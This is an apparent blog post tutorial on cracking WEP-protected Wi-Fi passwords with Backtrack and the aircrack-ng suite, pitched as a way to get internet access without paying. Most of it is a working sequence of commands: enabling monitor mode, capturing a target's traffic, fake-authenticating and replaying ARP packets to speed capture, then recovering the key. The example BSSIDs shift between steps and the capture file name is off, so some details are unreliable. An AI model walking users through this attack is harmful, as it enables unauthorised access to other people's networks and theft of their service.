Subscribe For Free Updates!

Monday 4 November 2013

Finding Wifi Password Easily With Backtrack In 3 Easy Steps......



Today's world is the world of information technology and internet .Internet is needed everywhere .Internet has become the part of our life.we can talk with friends ,play games ,earn money ,study and do many more things through internet .The main thing is that internet is not free u have to pay money for using Internet.but you can use it freely.I m going to explain.

Note:-The instruction below is for wep  encyrpt wifi security. for wpa and wpa/psk2 i would share later..........
few terminology you need to know
  1. wep: Wired Equivalent Privacy has weaker security than wpa and wpa/psk2
  2. AP : stands for Access Point or a wireless router .
  3. MAC Address : stands for ;Media Access Control ,its a unique address , It is in the Hexadecimal format like 00:5B:6B:2F:78:C8  .
  4. BSSID : It is the AP Mac Address.
  5. ESSID : It shows the AP broadcasting name 
Requirments:
  1. download Backtrack 
  2. A wifi catching devices if u are from desktop ,if laptop then not needed
processes:-
step1 :
  • After downloading backtrack iso u need to make it bootable .
  • you can make bootable either in your usb devices or dvd drive choice is yours.
  • download this software for making bootable either try this one 
step 2:
    • Boot your computer from usb or dvd drive.
    • after some time you will see linux desktop .
    • now click console at left top corner which is like command mode in window
    step 3:
      type the following code that are present in red color in your linux console.

      1)  type: ifconfig wlan0 up  (where wlan0 is the name of the wireless card)
          then type: iwconfig wlan0
      wlan0

      2) Now Putting your WiFi Adapter on Monitor Mode
          just open new console and enter the command below
          airmon-ng start (your interface)
           type :- airmon-ng start wlan0
      airmon-ng
      3)  Finding a suitable Target
            After putting your card into monitor mode,You can discover the surrounding networks        by entering the following command
             type:-   airodump-ng mon0

      airodump

      4) Attacking the Target

         Now to crack the WEP key you will have to capture the targets data into a file, To make    this we apply airodump tool .

          airodump-ng mon0 --bssid -c (channel ) -w (save to f )

      wifi

        As my target is broadcasted in channel 6 and has a bssid "98:fc:1a:c9:14:22" ,I type    following syntax and save the captured data as "shiva"

        type :- airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w shiva


      5) Now Speed up the cracking Using Aireplay
      Now you will have to capture at least 20,000 data packets to crack WEP .This can be done  in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then begin capturing the data packets but this process is very slow, it could take a long time or even weeks to gather that many data packets

      The second technique would be an (active attack )this technique is fast and only takes minutes to gather and inject that numerous packets .
      In an active attack you'll have do a Fake authentication (associate) with the AP ,then you will have to accumulate and inject packets. These could be done  easily by entering the below statements.

      aireplay-ng - 1 3 -a (bssid of the target ) (interface) 
      type:-aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0 
      airplay-ng
      Afterward doing a fake authentication ,now its time to get and inject Arp packets . To this you'll have to open a new Konsole simultaneously and type in the following commands

      aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)
       
      again type  aireplay-ng 3 -b  98:fc:11:c9:14:12 -h 10:c0:ca:50:f8:32 mon0
       
      look until it gains 20000 packets , best would be to look until it achieves about 50,000 to 60,000 packets
      airplay-ng
        6) Cracking WEP key using Aircrack
       
      Now its time crack the WEP key from the captured data, write the following syntax in a new konsole to crack the WEP key
      aircrack-ng (name of the file )
       
      type:-aircrack-ng shiva-0.1-cap

      0 comments:

      Post a Comment